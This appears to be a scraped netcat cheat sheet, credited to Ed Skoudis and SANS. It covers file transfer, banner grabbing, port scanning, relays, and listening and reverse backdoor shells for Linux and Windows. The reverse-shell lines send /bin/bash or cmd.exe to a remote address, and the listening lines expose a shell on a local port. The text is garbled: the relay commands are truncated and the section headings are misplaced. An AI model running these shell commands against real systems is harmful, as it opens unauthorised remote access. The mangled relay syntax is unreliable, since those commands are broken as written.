$ cd /tmp $ mknod backpipe p

Push a file from client to listener:

$ nc –l -p [LocalPort] > [outfile]

Listen on [LocalPort], store results in [outfile] $ nc –w3 [TargetIPaddr] [port] < [infile] Push [infile] to [TargetIPaddr] on [port]

Grab the banner of any TCP service running on an IP Address from Linux:

$ echo "" | nc –v –n –w1 [TargetIPaddr] [start_port]-[end_port]

Attempt to connect to each port in a range from [end_port] to [start_port] on IP Address [TargetIPaddr] running verbosely (-v), not resolving names (-n), and waiting no more than 1 second for a connection to occur (-w1). Then send a blank string to the open port and print out any banner received in response Add –r to randomize destination ports within the range Add –p [port] to specify a source port for the scan Backdoor Shells

Listener-to-Client Relay:

$ nc –l –p [LocalPort] 0

Create a relay that sends packets from the local port [LocalPort] to a Netcat client connected to [TargetIPaddr] on port [port]

Pull file from listener back to client:

$ nc –l -p [LocalPort] < [infile]

Listen on [LocalPort], prep to push [infile] $ nc –w3 [TargetIPaddr] [port] > [outfile] Connect to [TargetIPaddr] on [port] and retrieve [outfile] TCP Port Scanner

Listener-to-Listener Relay:

$ nc –l –p [LocalPort_1] 0

Create a relay that sends packets from any connection on [LocalPort_1] to any connection on [LocalPort_2]

Port scan an IP Address:

$ nc –v –n –z –w1 [TargetIPaddr] [start_port]-[end_port]

Attempt to connect to each port in a range from [end_port] to [start_port] on IP Address [TargetIPaddr] running verbosely (-v on Linux, vv on Windows), not resolving names (-n), without sending any data (-z), and waiting no more than 1 second for a connection to occur (-w1) The randomize ports (-r) switch can be used to choose port numbers randomly in the range

Listening backdoor shell on Linux:

$ nc –l –p [LocalPort] –e /bin/bash Listening backdoor shell on Windows: C:\> nc –l –p [LocalPort] –e cmd.exe

Create a shell on local port [LocalPort] that can then be accessed using a fundamental Netcat client

Client-to-Client Relay:

$ nc [PreviousHopIPaddr] [port] 0

Create a relay that sends packets from the connection to [PreviousHopIPaddr] on port [port] to a Netcat client connected to [NextHopIPaddr] on port [port2]

Reverse backdoor shell on Linux:

$ nc [YourIPaddr] [port] –e /bin/bash

Reverse backdoor shell on Windows:

C:\> nc [YourIPaddr] [port] –e cmd.exe

Create a reverse shell that will attempt to connect to [YourIPaddr] on local port [port]. This shell can then be captured using a fundamental nc listener Thanks to Ed Skoudis for providing a huge variety of cheats on nc @ http://www.sans.org